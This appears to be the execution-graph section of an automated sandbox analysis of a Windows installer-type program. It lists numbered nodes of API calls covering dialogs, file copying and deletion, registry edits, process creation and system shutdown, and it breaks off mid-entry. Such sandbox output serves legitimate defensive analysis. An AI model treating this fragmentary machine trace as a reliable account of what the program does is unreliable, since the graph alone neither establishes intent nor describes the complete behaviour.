                                                          Dynamic/Decrypted Code Coverage:13.9%
                                                          Signature Coverage:18.7%
                                                          Total number of Nodes:1521
                                                          Total number of Limit Nodes:41
                                                          execution_graph 4941 10001000 4944 1000101b 4941->4944 4951 10001516 4944->4951 4946 10001020 4947 10001024 4946->4947 4948 10001027 GlobalAlloc 4946->4948 4949 1000153d 3 API calls 4947->4949 4948->4947 4950 10001019 4949->4950 4953 1000151c 4951->4953 4952 10001522 4952->4946 4953->4952 4954 1000152e GlobalFree 4953->4954 4954->4946 4955 401d41 GetDC GetDeviceCaps 4956 402b1d 18 API calls 4955->4956 4957 401d5f MulDiv ReleaseDC 4956->4957 4958 402b1d 18 API calls 4957->4958 4959 401d7e 4958->4959 4960 405f6a 18 API calls 4959->4960 4961 401db7 CreateFontIndirectW 4960->4961 4962 4024e8 4961->4962 4006 403cc2 4007 403e15 4006->4007 4008 403cda 4006->4008 4009 403e26 GetDlgItem GetDlgItem 4007->4009 4018 403e66 4007->4018 4008->4007 4010 403ce6 4008->4010 4013 40419a 19 API calls 4009->4013 4011 403cf1 SetWindowPos 4010->4011 4012 403d04 4010->4012 4011->4012 4015 403d21 4012->4015 4016 403d09 ShowWindow 4012->4016 4017 403e50 SetClassLongW 4013->4017 4014 403ec0 4024 403e10 4014->4024 4076 4041e6 4014->4076 4020 403d43 4015->4020 4021 403d29 DestroyWindow 4015->4021 4016->4015 4022 40140b 2 API calls 4017->4022 4018->4014 4023 401389 2 API calls 4018->4023 4026 403d48 SetWindowLongW 4020->4026 4027 403d59 4020->4027 4025 404123 4021->4025 4022->4018 4028 403e98 4023->4028 4025->4024 4034 404154 ShowWindow 4025->4034 4026->4024 4031 403e02 4027->4031 4032 403d65 GetDlgItem 4027->4032 4028->4014 4033 403e9c SendMessageW 4028->4033 4029 40140b 2 API calls 4047 403ed2 4029->4047 4030 404125 DestroyWindow EndDialog 4030->4025 4095 404201 4031->4095 4035 403d95 4032->4035 4036 403d78 SendMessageW IsWindowEnabled 4032->4036 4033->4024 4034->4024 4039 403da2 4035->4039 4040 403db5 4035->4040 4041 403de9 SendMessageW 4035->4041 4050 403d9a 4035->4050 4036->4024 4036->4035 4038 405f6a 18 API calls 4038->4047 4039->4041 4039->4050 4044 403dd2 4040->4044 4045 403dbd 4040->4045 4041->4031 4043 40419a 19 API calls 4043->4047 4049 40140b 2 API calls 4044->4049 4089 40140b 4045->4089 4046 403dd0 4046->4031 4047->4024 4047->4029 4047->4030 4047->4038 4047->4043 4067 404065 DestroyWindow 4047->4067 4079 40419a 4047->4079 4051 403dd9 4049->4051 4092 404173 4050->4092 4051->4031 4051->4050 4053 403f4d GetDlgItem 4054 403f62 4053->4054 4055 403f6a ShowWindow KiUserCallbackDispatcher 4053->4055 4054->4055 4082 4041bc KiUserCallbackDispatcher 4055->4082 4057 403f94 EnableWindow 4060 403fa8 4057->4060 4058 403fad GetSystemMenu EnableMenuItem SendMessageW 4059 403fdd SendMessageW 4058->4059 4058->4060 4059->4060 4060->4058 4083 4041cf SendMessageW 4060->4083 4084 405f48 lstrcpynW 4060->4084 4063 40400b lstrlenW 4064 405f6a 18 API calls 4063->4064 4065 404021 SetWindowTextW 4064->4065 4085 401389 4065->4085 4067->4025 4068 40407f CreateDialogParamW 4067->4068 4068->4025 4069 4040b2 4068->4069 4070 40419a 19 API calls 4069->4070 4071 4040bd GetDlgItem GetWindowRect ScreenToClient SetWindowPos 4070->4071 4072 401389 2 API calls 4071->4072 4073 404103 4072->4073 4073->4024 4074 40410b ShowWindow 4073->4074 4075 4041e6 SendMessageW 4074->4075 4075->4025 4077 4041fe 4076->4077 4078 4041ef SendMessageW 4076->4078 4077->4047 4078->4077 4080 405f6a 18 API calls 4079->4080 4081 4041a5 SetDlgItemTextW 4080->4081 4081->4053 4082->4057 4083->4060 4084->4063 4087 401390 4085->4087 4086 4013fe 4086->4047 4087->4086 4088 4013cb MulDiv SendMessageW 4087->4088 4088->4087 4090 401389 2 API calls 4089->4090 4091 401420 4090->4091 4091->4050 4093 404180 SendMessageW 4092->4093 4094 40417a 4092->4094 4093->4046 4094->4093 4096 404219 GetWindowLongW 4095->4096 4097 4042a2 4095->4097 4096->4097 4098 40422a 4096->4098 4097->4024 4099 404239 GetSysColor 4098->4099 4100 40423c 4098->4100 4099->4100 4101 404242 SetTextColor 4100->4101 4102 40424c SetBkMode 4100->4102 4101->4102 4103 404264 GetSysColor 4102->4103 4104 40426a 4102->4104 4103->4104 4105 404271 SetBkColor 4104->4105 4106 40427b 4104->4106 4105->4106 4106->4097 4107 404295 CreateBrushIndirect 4106->4107 4108 40428e DeleteObject 4106->4108 4107->4097 4108->4107 4963 401a42 4964 402b1d 18 API calls 4963->4964 4965 401a48 4964->4965 4966 402b1d 18 API calls 4965->4966 4967 4019f0 4966->4967 4968 402746 4969 402741 4968->4969 4969->4968 4970 402756 FindNextFileW 4969->4970 4971 4027a8 4970->4971 4973 402761 4970->4973 4974 405f48 lstrcpynW 4971->4974 4974->4973 4975 401cc6 4976 402b1d 18 API calls 4975->4976 4977 401cd9 SetWindowLongW 4976->4977 4978 4029c7 4977->4978 4252 401dc7 4260 402b1d 4252->4260 4254 401dcd 4255 402b1d 18 API calls 4254->4255 4256 401dd6 4255->4256 4257 401de8 EnableWindow 4256->4257 4258 401ddd ShowWindow 4256->4258 4259 4029c7 4257->4259 4258->4259 4261 405f6a 18 API calls 4260->4261 4262 402b31 4261->4262 4262->4254 4979 401bca 4980 402b1d 18 API calls 4979->4980 4981 401bd1 4980->4981 4982 402b1d 18 API calls 4981->4982 4983 401bdb 4982->4983 4984 401beb 4983->4984 4985 402b3a 18 API calls 4983->4985 4986 401bfb 4984->4986 4987 402b3a 18 API calls 4984->4987 4985->4984 4988 401c06 4986->4988 4989 401c4a 4986->4989 4987->4986 4991 402b1d 18 API calls 4988->4991 4990 402b3a 18 API calls 4989->4990 4992 401c4f 4990->4992 4993 401c0b 4991->4993 4994 402b3a 18 API calls 4992->4994 4995 402b1d 18 API calls 4993->4995 4997 401c58 FindWindowExW 4994->4997 4996 401c14 4995->4996 4998 401c3a SendMessageW 4996->4998 4999 401c1c SendMessageTimeoutW 4996->4999 5000 401c7a 4997->5000 4998->5000 4999->5000 4285 4014cb 4286 4051f2 25 API calls 4285->4286 4287 4014d2 4286->4287 5001 40194b 5002 402b1d 18 API calls 5001->5002 5003 401952 5002->5003 5004 402b1d 18 API calls 5003->5004 5005 40195c 5004->5005 5006 402b3a 18 API calls 5005->5006 5007 401965 5006->5007 5008 401979 lstrlenW 5007->5008 5013 4019b5 5007->5013 5009 401983 5008->5009 5009->5013 5014 405f48 lstrcpynW 5009->5014 5011 40199e 5012 4019ab lstrlenW 5011->5012 5011->5013 5012->5013 5014->5011 5015 4024cc 5016 402b3a 18 API calls 5015->5016 5017 4024d3 5016->5017 5020 405bb4 GetFileAttributesW CreateFileW 5017->5020 5019 4024df 5020->5019 5021 40164d 5022 402b3a 18 API calls 5021->5022 5023 401653 5022->5023 5024 40628b 2 API calls 5023->5024 5025 401659 5024->5025 5026 4019cf 5027 402b3a 18 API calls 5026->5027 5028 4019d6 5027->5028 5029 402b3a 18 API calls 5028->5029 5030 4019df 5029->5030 5031 4019e6 lstrcmpiW 5030->5031 5032 4019f8 lstrcmpW 5030->5032 5033 4019ec 5031->5033 5032->5033 5034 401e51 5035 402b3a 18 API calls 5034->5035 5036 401e57 5035->5036 5037 4051f2 25 API calls 5036->5037 5038 401e61 5037->5038 5039 4056c3 2 API calls 5038->5039 5040 401e67 5039->5040 5041 401ec6 CloseHandle 5040->5041 5042 401e77 WaitForSingleObject 5040->5042 5044 402793 5040->5044 5041->5044 5043 401e89 5042->5043 5045 401e9b GetExitCodeProcess 5043->5045 5046 4062eb 2 API calls 5043->5046 5047 401eb8 5045->5047 5048 401ead 5045->5048 5049 401e90 WaitForSingleObject 5046->5049 5047->5041 5051 405e8f wsprintfW 5048->5051 5049->5043 5051->5047 4344 401752 4345 402b3a 18 API calls 4344->4345 4346 401759 4345->4346 4347 401781 4346->4347 4348 401779 4346->4348 4400 405f48 lstrcpynW 4347->4400 4399 405f48 lstrcpynW 4348->4399 4351 40178c 4353 405993 3 API calls 4351->4353 4352 40177f 4355 4061dc 5 API calls 4352->4355 4354 401792 lstrcatW 4353->4354 4354->4352 4360 40179e 4355->4360 4356 40628b 2 API calls 4356->4360 4357 4017da 4359 405b8f 2 API calls 4357->4359 4359->4360 4360->4356 4360->4357 4361 4017b0 CompareFileTime 4360->4361 4362 401870 4360->4362 4365 405f48 lstrcpynW 4360->4365 4371 405f6a 18 API calls 4360->4371 4382 401847 4360->4382 4383 405bb4 GetFileAttributesW CreateFileW 4360->4383 4401 405724 4360->4401 4361->4360 4363 4051f2 25 API calls 4362->4363 4366 40187a 4363->4366 4364 4051f2 25 API calls 4370 40185c 4364->4370 4365->4360 4384 403062 4366->4384 4368 4018a1 SetFileTime 4372 4018b3 CloseHandle 4368->4372 4371->4360 4372->4370 4373 4018c4 4372->4373 4374 4018c9 4373->4374 4375 4018dc 4373->4375 4376 405f6a 18 API calls 4374->4376 4377 405f6a 18 API calls 4375->4377 4378 4018d1 lstrcatW 4376->4378 4379 4018e4 4377->4379 4378->4379 4381 405724 MessageBoxIndirectW 4379->4381 4381->4370 4382->4364 4382->4370 4383->4360 4385 403072 SetFilePointer 4384->4385 4386 40308e 4384->4386 4385->4386 4405 40317d GetTickCount 4386->4405 4389 405c37 ReadFile 4390 4030ae 4389->4390 4391 40317d 43 API calls 4390->4391 4398 40188d 4390->4398 4392 4030c5 4391->4392 4393 4030d5 4392->4393 4394 40313f ReadFile 4392->4394 4392->4398 4396 405c37 ReadFile 4393->4396 4397 403108 WriteFile 4393->4397 4393->4398 4394->4398 4396->4393 4397->4393 4397->4398 4398->4368 4398->4372 4399->4352 4400->4351 4402 405739 4401->4402 4403 405785 4402->4403 4404 40574d MessageBoxIndirectW 4402->4404 4403->4360 4404->4403 4406 4032e7 4405->4406 4407 4031ac 4405->4407 4408 402d1a 33 API calls 4406->4408 4418 40330f SetFilePointer 4407->4418 4414 403095 4408->4414 4410 4031b7 SetFilePointer 4416 4031dc 4410->4416 4414->4389 4414->4398 4415 403271 WriteFile 4415->4414 4415->4416 4416->4414 4416->4415 4417 4032c8 SetFilePointer 4416->4417 4419 4032f9 4416->4419 4422 4063ee 4416->4422 4429 402d1a 4416->4429 4417->4406 4418->4410 4420 405c37 ReadFile 4419->4420 4421 40330c 4420->4421 4421->4416 4423 406413 4422->4423 4426 40641b 4422->4426 4423->4416 4424 4064a2 GlobalFree 4425 4064ab GlobalAlloc 4424->4425 4425->4423 4425->4426 4426->4423 4426->4424 4426->4425 4427 406522 GlobalAlloc 4426->4427 4428 406519 GlobalFree 4426->4428 4427->4423 4427->4426 4428->4427 4430 402d43 4429->4430 4431 402d2b 4429->4431 4433 402d53 GetTickCount 4430->4433 4434 402d4b 4430->4434 4432 402d34 DestroyWindow 4431->4432 4437 402d3b 4431->4437 4432->4437 4436 402d61 4433->4436 4433->4437 4444 4062eb 4434->4444 4438 402d96 CreateDialogParamW ShowWindow 4436->4438 4439 402d69 4436->4439 4437->4416 4438->4437 4439->4437 4448 402cfe 4439->4448 4441 402d77 wsprintfW 4442 4051f2 25 API calls 4441->4442 4443 402d94 4442->4443 4443->4437 4445 406308 PeekMessageW 4444->4445 4446 406318 4445->4446 4447 4062fe DispatchMessageW 4445->4447 4446->4437 4447->4445 4449 402d0d 4448->4449 4450 402d0f MulDiv 4448->4450 4449->4450 4450->4441 4451 402253 4452 402261 4451->4452 4453 40225b 4451->4453 4455 402b3a 18 API calls 4452->4455 4458 40226f 4452->4458 4454 402b3a 18 API calls 4453->4454 4454->4452 4455->4458 4456 40227d 4457 402b3a 18 API calls 4456->4457 4460 402286 WritePrivateProfileStringW 4457->4460 4458->4456 4459 402b3a 18 API calls 4458->4459 4459->4456 5066 402454 5067 402c44 19 API calls 5066->5067 5068 40245e 5067->5068 5069 402b1d 18 API calls 5068->5069 5070 402467 5069->5070 5071 40248b RegEnumValueW 5070->5071 5072 40247f RegEnumKeyW 5070->5072 5073 402793 5070->5073 5071->5073 5074 4024a4 RegCloseKey 5071->5074 5072->5074 5074->5073 5076 401ed4 5077 402b3a 18 API calls 5076->5077 5078 401edb 5077->5078 5079 40628b 2 API calls 5078->5079 5080 401ee1 5079->5080 5081 401ef2 5080->5081 5083 405e8f wsprintfW 5080->5083 5083->5081 4474 4022d5 4475 402305 4474->4475 4476 4022da 4474->4476 4478 402b3a 18 API calls 4475->4478 4477 402c44 19 API calls 4476->4477 4479 4022e1 4477->4479 4480 40230c 4478->4480 4481 4022eb 4479->4481 4485 402322 4479->4485 4486 402b7a RegOpenKeyExW 4480->4486 4482 402b3a 18 API calls 4481->4482 4484 4022f2 RegDeleteValueW RegCloseKey 4482->4484 4484->4485 4487 402c0e 4486->4487 4491 402ba5 4486->4491 4487->4485 4488 402bcb RegEnumKeyW 4489 402bdd RegCloseKey 4488->4489 4488->4491 4492 4062b2 3 API calls 4489->4492 4490 402c02 RegCloseKey 4495 402bf1 4490->4495 4491->4488 4491->4489 4491->4490 4493 402b7a 3 API calls 4491->4493 4494 402bed 4492->4494 4493->4491 4494->4495 4496 402c1d RegDeleteKeyW 4494->4496 4495->4487 4496->4495 4504 4014d7 4505 402b1d 18 API calls 4504->4505 4506 4014dd Sleep 4505->4506 4508 4029c7 4506->4508 4720 40335a #17 SetErrorMode OleInitialize 4721 4062b2 3 API calls 4720->4721 4722 40339d SHGetFileInfoW 4721->4722 4795 405f48 lstrcpynW 4722->4795 4724 4033c8 GetCommandLineW 4796 405f48 lstrcpynW 4724->4796 4726 4033da GetModuleHandleW 4727 4033f4 4726->4727 4728 4059c0 CharNextW 4727->4728 4729 403402 CharNextW 4728->4729 4741 403414 4729->4741 4730 403516 4731 40352a GetTempPathW 4730->4731 4797 403326 4731->4797 4733 403542 4734 403546 GetWindowsDirectoryW lstrcatW 4733->4734 4735 40359c DeleteFileW 4733->4735 4737 403326 11 API calls 4734->4737 4805 402dbc GetTickCount GetModuleFileNameW 4735->4805 4736 4059c0 CharNextW 4736->4741 4739 403562 4737->4739 4739->4735 4742 403566 GetTempPathW lstrcatW SetEnvironmentVariableW SetEnvironmentVariableW 4739->4742 4740 4035b0 4749 4059c0 CharNextW 4740->4749 4778 403653 4740->4778 4790 403663 4740->4790 4741->4730 4741->4736 4743 403518 4741->4743 4744 403326 11 API calls 4742->4744 4889 405f48 lstrcpynW 4743->4889 4748 403594 4744->4748 4748->4735 4748->4790 4763 4035cf 4749->4763 4751 403772 4754 403815 ExitProcess 4751->4754 4759 4062b2 3 API calls 4751->4759 4752 40367c 4753 405724 MessageBoxIndirectW 4752->4753 4755 40368a ExitProcess 4753->4755 4756 403692 lstrcatW lstrcmpiW 4761 4036ae CreateDirectoryW SetCurrentDirectoryW 4756->4761 4756->4790 4757 40362d 4760 405a9b 18 API calls 4757->4760 4762 403785 4759->4762 4764 403639 4760->4764 4765 4036d1 4761->4765 4766 4036c6 4761->4766 4767 4062b2 3 API calls 4762->4767 4763->4756 4763->4757 4764->4790 4890 405f48 lstrcpynW 4764->4890 4902 405f48 lstrcpynW 4765->4902 4901 405f48 lstrcpynW 4766->4901 4768 40378e 4767->4768 4771 4062b2 3 API calls 4768->4771 4773 403797 4771->4773 4775 4037b5 4773->4775 4781 4037a5 GetCurrentProcess 4773->4781 4774 403648 4891 405f48 lstrcpynW 4774->4891 4779 4062b2 3 API calls 4775->4779 4777 405f6a 18 API calls 4780 403710 DeleteFileW 4777->4780 4835 40391f 4778->4835 4782 4037ec 4779->4782 4783 40371d CopyFileW 4780->4783 4792 4036df 4780->4792 4781->4775 4785 403801 ExitWindowsEx 4782->4785 4787 40380e 4782->4787 4783->4792 4784 403766 4788 405de2 40 API calls 4784->4788 4785->4754 4785->4787 4786 405de2 40 API calls 4786->4792 4789 40140b 2 API calls 4787->4789 4788->4790 4789->4754 4892 40382d 4790->4892 4791 405f6a 18 API calls 4791->4792 4792->4777 4792->4784 4792->4786 4792->4791 4794 403751 CloseHandle 4792->4794 4903 4056c3 CreateProcessW 4792->4903 4794->4792 4795->4724 4796->4726 4798 4061dc 5 API calls 4797->4798 4800 403332 4798->4800 4799 40333c 4799->4733 4800->4799 4801 405993 3 API calls 4800->4801 4802 403344 CreateDirectoryW 4801->4802 4906 405be3 4802->4906 4910 405bb4 GetFileAttributesW CreateFileW 4805->4910 4807 402dff 4834 402e0c 4807->4834 4911 405f48 lstrcpynW 4807->4911 4809 402e22 4810 4059df 2 API calls 4809->4810 4811 402e28 4810->4811 4912 405f48 lstrcpynW 4811->4912 4813 402e33 GetFileSize 4814 402f34 4813->4814 4832 402e4a 4813->4832 4815 402d1a 33 API calls 4814->4815 4816 402f3b 4815->4816 4818 402f77 GlobalAlloc 4816->4818 4816->4834 4914 40330f SetFilePointer 4816->4914 4817 4032f9 ReadFile 4817->4832 4822 402f8e 4818->4822 4819 402fcf 4820 402d1a 33 API calls 4819->4820 4820->4834 4824 405be3 2 API calls 4822->4824 4823 402f58 4825 4032f9 ReadFile 4823->4825 4827 402f9f CreateFileW 4824->4827 4828 402f63 4825->4828 4826 402d1a 33 API calls 4826->4832 4829 402fd9 4827->4829 4827->4834 4828->4818 4828->4834 4913 40330f SetFilePointer 4829->4913 4831 402fe7 4833 403062 46 API calls 4831->4833 4832->4814 4832->4817 4832->4819 4832->4826 4832->4834 4833->4834 4834->4740 4836 4062b2 3 API calls 4835->4836 4837 403933 4836->4837 4838 403939 4837->4838 4839 40394b 4837->4839 4924 405e8f wsprintfW 4838->4924 4840 405e15 3 API calls 4839->4840 4841 40397b 4840->4841 4842 40399a lstrcatW 4841->4842 4845 405e15 3 API calls 4841->4845 4844 403949 4842->4844 4915 403bf5 4844->4915 4845->4842 4848 405a9b 18 API calls 4849 4039cc 4848->4849 4850 403a60 4849->4850 4853 405e15 3 API calls 4849->4853 4851 405a9b 18 API calls 4850->4851 4852 403a66 4851->4852 4854 403a76 LoadImageW 4852->4854 4856 405f6a 18 API calls 4852->4856 4855 4039fe 4853->4855 4857 403b1c 4854->4857 4858 403a9d RegisterClassW 4854->4858 4855->4850 4859 403a1f lstrlenW 4855->4859 4863 4059c0 CharNextW 4855->4863 4856->4854 4862 40140b 2 API calls 4857->4862 4860 403ad3 SystemParametersInfoW CreateWindowExW 4858->4860 4861 403b26 4858->4861 4864 403a53 4859->4864 4865 403a2d lstrcmpiW 4859->4865 4860->4857 4861->4790 4866 403b22 4862->4866 4867 403a1c 4863->4867 4869 405993 3 API calls 4864->4869 4865->4864 4868 403a3d GetFileAttributesW 4865->4868 4866->4861 4871 403bf5 19 API calls 4866->4871 4867->4859 4870 403a49 4868->4870 4872 403a59 4869->4872 4870->4864 4873 4059df 2 API calls 4870->4873 4874 403b33 4871->4874 4925 405f48 lstrcpynW 4872->4925 4873->4864 4876 403bc2 4874->4876 4877 403b3f ShowWindow LoadLibraryW 4874->4877 4878 4052c5 5 API calls 4876->4878 4879 403b65 GetClassInfoW 4877->4879 4880 403b5e LoadLibraryW 4877->4880 4883 403bc8 4878->4883 4881 403b79 GetClassInfoW RegisterClassW 4879->4881 4882 403b8f DialogBoxParamW 4879->4882 4880->4879 4881->4882 4884 40140b 2 API calls 4882->4884 4885 403be4 4883->4885 4886 403bcc 4883->4886 4884->4861 4887 40140b 2 API calls 4885->4887 4886->4861 4888 40140b 2 API calls 4886->4888 4887->4861 4888->4861 4889->4731 4890->4774 4891->4778 4893 403848 4892->4893 4894 40383e CloseHandle 4892->4894 4895 403852 CloseHandle 4893->4895 4896 40385c 4893->4896 4894->4893 4895->4896 4927 40388a 4896->4927 4899 4057d0 71 API calls 4900 40366c OleUninitialize 4899->4900 4900->4751 4900->4752 4901->4765 4902->4792 4904 4056f2 CloseHandle 4903->4904 4905 4056fe 4903->4905 4904->4905 4905->4792 4907 405bf0 GetTickCount GetTempFileNameW 4906->4907 4908 405c26 4907->4908 4909 403358 4907->4909 4908->4907 4908->4909 4909->4733 4910->4807 4911->4809 4912->4813 4913->4831 4914->4823 4916 403c09 4915->4916 4926 405e8f wsprintfW 4916->4926 4918 403c7a 4919 405f6a 18 API calls 4918->4919 4920 403c86 SetWindowTextW 4919->4920 4921 403ca2 4920->4921 4922 4039aa 4920->4922 4921->4922 4923 405f6a 18 API calls 4921->4923 4922->4848 4923->4921 4924->4844 4925->4850 4926->4918 4928 403898 4927->4928 4929 40389d FreeLibrary GlobalFree 4928->4929 4930 403861 4928->4930 4929->4929 4929->4930 4930->4899 5091 40155b 5092 40296d 5091->5092 5095 405e8f wsprintfW 5092->5095 5094 402972 5095->5094 5096 4038dd 5097 4038e8 5096->5097 5098 4038ec 5097->5098 5099 4038ef GlobalAlloc 5097->5099 5099->5098 5100 40165e 5101 402b3a 18 API calls 5100->5101 5102 401665 5101->5102 5103 402b3a 18 API calls 5102->5103 5104 40166e 5103->5104 5105 402b3a 18 API calls 5104->5105 5106 401677 MoveFileW 5105->5106 5107 401683 5106->5107 5108 40168a 5106->5108 5110 401423 25 API calls 5107->5110 5109 40628b 2 API calls 5108->5109 5112 402197 5108->5112 5111 401699 5109->5111 5110->5112 5111->5112 5113 405de2 40 API calls 5111->5113 5113->5107 3945 4023e0 3956 402c44 3945->3956 3947 4023ea 3960 402b3a 3947->3960 3950 4023fe RegQueryValueExW 3951 40241e 3950->3951 3952 402424 RegCloseKey 3950->3952 3951->3952 3966 405e8f wsprintfW 3951->3966 3953 402793 3952->3953 3957 402b3a 18 API calls 3956->3957 3958 402c5d 3957->3958 3959 402c6b RegOpenKeyExW 3958->3959 3959->3947 3961 402b46 3960->3961 3967 405f6a 3961->3967 3963 4023f3 3963->3950 3963->3953 3966->3952 3982 405f77 3967->3982 3968 4061c2 3969 402b67 3968->3969 4001 405f48 lstrcpynW 3968->4001 3969->3963 3985 4061dc 3969->3985 3971 40602a GetVersion 3971->3982 3972 406190 lstrlenW 3972->3982 3973 405f6a 10 API calls 3973->3972 3976 4060a5 GetSystemDirectoryW 3976->3982 3978 4060b8 GetWindowsDirectoryW 3978->3982 3979 4061dc 5 API calls 3979->3982 3980 405f6a 10 API calls 3980->3982 3981 406131 lstrcatW 3981->3982 3982->3968 3982->3971 3982->3972 3982->3973 3982->3976 3982->3978 3982->3979 3982->3980 3982->3981 3983 4060ec SHGetSpecialFolderLocation 3982->3983 3994 405e15 RegOpenKeyExW 3982->3994 3999 405e8f wsprintfW 3982->3999 4000 405f48 lstrcpynW 3982->4000 3983->3982 3984 406104 SHGetPathFromIDListW CoTaskMemFree 3983->3984 3984->3982 3986 4061e9 3985->3986 3988 40625f 3986->3988 3989 406252 CharNextW 3986->3989 3992 40623e CharNextW 3986->3992 3993 40624d CharNextW 3986->3993 4002 4059c0 3986->4002 3987 406264 CharPrevW 3987->3988 3988->3987 3990 406285 3988->3990 3989->3986 3989->3988 3990->3963 3992->3986 3993->3989 3995 405e89 3994->3995 3996 405e49 RegQueryValueExW 3994->3996 3995->3982 3997 405e6a RegCloseKey 3996->3997 3997->3995 3999->3982 4000->3982 4001->3969 4003 4059c6 4002->4003 4004 4059dc 4003->4004 4005 4059cd CharNextW 4003->4005 4004->3986 4005->4003 5114 401ce5 GetDlgItem GetClientRect 5115 402b3a 18 API calls 5114->5115 5116 401d17 LoadImageW SendMessageW 5115->5116 5117 401d35 DeleteObject 5116->5117 5118 4029c7 5116->5118 5117->5118 5119 405166 5120 405176 5119->5120 5121 40518a 5119->5121 5122 4051d3 5120->5122 5123 40517c 5120->5123 5124 405192 IsWindowVisible 5121->5124 5130 4051a9 5121->5130 5126 4051d8 CallWindowProcW 5122->5126 5127 4041e6 SendMessageW 5123->5127 5124->5122 5125 40519f 5124->5125 5132 404abc SendMessageW 5125->5132 5129 405186 5126->5129 5127->5129 5130->5126 5137 404b3c 5130->5137 5133 404b1b SendMessageW 5132->5133 5134 404adf GetMessagePos ScreenToClient SendMessageW 5132->5134 5136 404b13 5133->5136 5135 404b18 5134->5135 5134->5136 5135->5133 5136->5130 5146 405f48 lstrcpynW 5137->5146 5139 404b4f 5147 405e8f wsprintfW 5139->5147 5141 404b59 5142 40140b 2 API calls 5141->5142 5143 404b62 5142->5143 5148 405f48 lstrcpynW 5143->5148 5145 404b69 5145->5122 5146->5139 5147->5141 5148->5145 5149 4042e8 lstrlenW 5150 404307 5149->5150 5151 404309 WideCharToMultiByte 5149->5151 5150->5151 5159 100018a9 5160 100018cc 5159->5160 5161 100018ff GlobalFree 5160->5161 5162 10001911 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z __allrem 5160->5162 5161->5162 5163 10001272 2 API calls 5162->5163 5164 10001a87 GlobalFree GlobalFree 5163->5164 4266 40206a 4267 402b3a 18 API calls 4266->4267 4268 402071 4267->4268 4269 402b3a 18 API calls 4268->4269 4270 40207b 4269->4270 4271 402b3a 18 API calls 4270->4271 4272 402084 4271->4272 4273 402b3a 18 API calls 4272->4273 4274 40208e 4273->4274 4275 402b3a 18 API calls 4274->4275 4276 402098 4275->4276 4277 4020ac CoCreateInstance 4276->4277 4278 402b3a 18 API calls 4276->4278 4281 4020cb 4277->4281 4278->4277 4280 402197 4281->4280 4282 401423 4281->4282 4283 4051f2 25 API calls 4282->4283 4284 401431 4283->4284 4284->4280 5165 40156b 5166 401584 5165->5166 5167 40157b ShowWindow 5165->5167 5168 401592 ShowWindow 5166->5168 5169 4029c7 5166->5169 5167->5166 5168->5169 5170 404b6e GetDlgItem GetDlgItem 5171 404bc0 7 API calls 5170->5171 5179 404dd9 5170->5179 5172 404c63 DeleteObject 5171->5172 5173 404c56 SendMessageW 5171->5173 5174 404c6c 5172->5174 5173->5172 5176 404ca3 5174->5176 5178 405f6a 18 API calls 5174->5178 5175 404ebd 5177 404f69 5175->5177 5186 404f16 SendMessageW 5175->5186 5209 404dcc 5175->5209 5180 40419a 19 API calls 5176->5180 5182 404f73 SendMessageW 5177->5182 5183 404f7b 5177->5183 5184 404c85 SendMessageW SendMessageW 5178->5184 5179->5175 5190 404abc 5 API calls 5179->5190 5213 404e4a 5179->5213 5181 404cb7 5180->5181 5185 40419a 19 API calls 5181->5185 5182->5183 5189 404fa4 5183->5189 5195 404f94 5183->5195 5196 404f8d ImageList_Destroy 5183->5196 5184->5174 5191 404cc5 5185->5191 5193 404f2b SendMessageW 5186->5193 5186->5209 5187 404201 8 API calls 5194 40515f 5187->5194 5188 404eaf SendMessageW 5188->5175 5192 405113 5189->5192 5212 404b3c 4 API calls 5189->5212 5217 404fdf 5189->5217 5190->5213 5198 404d9a GetWindowLongW SetWindowLongW 5191->5198 5205 404d15 SendMessageW 5191->5205 5207 404d94 5191->5207 5210 404d51 SendMessageW 5191->5210 5211 404d62 SendMessageW 5191->5211 5199 405125 ShowWindow GetDlgItem ShowWindow 5192->5199 5192->5209 5201 404f3e 5193->5201 5195->5189 5197 404f9d GlobalFree 5195->5197 5196->5195 5197->5189 5200 404db3 5198->5200 5199->5209 5202 404dd1 5200->5202 5203 404db9 ShowWindow 5200->5203 5206 404f4f SendMessageW 5201->5206 5222 4041cf SendMessageW 5202->5222 5221 4041cf SendMessageW 5203->5221 5205->5191 5206->5177 5207->5198 5207->5200 5209->5187 5210->5191 5211->5191 5212->5217 5213->5175 5213->5188 5214 4050e9 InvalidateRect 5214->5192 5215 4050ff 5214->5215 5223 4049d6 5215->5223 5216 40500d SendMessageW 5220 405023 5216->5220 5217->5216 5217->5220 5219 405097 SendMessageW SendMessageW 5219->5220 5220->5214 5220->5219 5221->5209 5222->5179 5224 4049f3 5223->5224 5225 405f6a 18 API calls 5224->5225 5226 404a28 5225->5226 5227 405f6a 18 API calls 5226->5227 5228 404a33 5227->5228 5229 405f6a 18 API calls 5228->5229 5230 404a64 lstrlenW wsprintfW SetDlgItemTextW 5229->5230 5230->5192 5231 4024ee 5232 4024f3 5231->5232 5233 40250c 5231->5233 5234 402b1d 18 API calls 5232->5234 5235 402512 5233->5235 5236 40253e 5233->5236 5241 4024fa 5234->5241 5237 402b3a 18 API calls 5235->5237 5238 402b3a 18 API calls 5236->5238 5239 402519 WideCharToMultiByte lstrlenA 5237->5239 5240 402545 lstrlenW 5238->5240 5239->5241 5240->5241 5242 402793 5241->5242 5243 402567 WriteFile 5241->5243 5243->5242 5244 4045ee 5245 404624 5244->5245 5246 4045fe 5244->5246 5248 404201 8 API calls 5245->5248 5247 40419a 19 API calls 5246->5247 5249 40460b SetDlgItemTextW 5247->5249 5250 404630 5248->5250 5249->5245 5251 4018ef 5252 401926 5251->5252 5253 402b3a 18 API calls 5252->5253 5254 40192b 5253->5254 5255 4057d0 71 API calls 5254->5255 5256 401934 5255->5256 5257 404970 5258 404980 5257->5258 5259 40499c 5257->5259 5268 405708 GetDlgItemTextW 5258->5268 5261 4049a2 SHGetPathFromIDListW 5259->5261 5262 4049cf 5259->5262 5264 4049b9 SendMessageW 5261->5264 5265 4049b2 5261->5265 5263 40498d SendMessageW 5263->5259 5264->5262 5266 40140b 2 API calls 5265->5266 5266->5264 5268->5263 5269 402770 5270 402b3a 18 API calls 5269->5270 5271 402777 FindFirstFileW 5270->5271 5272 40278a 5271->5272 5273 40279f 5271->5273 5274 4027a8 5273->5274 5277 405e8f wsprintfW 5273->5277 5278 405f48 lstrcpynW 5274->5278 5277->5274 5278->5272 5279 4014f1 SetForegroundWindow 5280 4029c7 5279->5280 5281 4018f2 5282 402b3a 18 API calls 5281->5282 5283 4018f9 5282->5283 5284 405724 MessageBoxIndirectW 5283->5284 5285 401902 5284->5285 4461 402573 4462 402b1d 18 API calls 4461->4462 4468 402582 4462->4468 4463 4026a0 4464 4025c8 ReadFile 4464->4463 4464->4468 4465 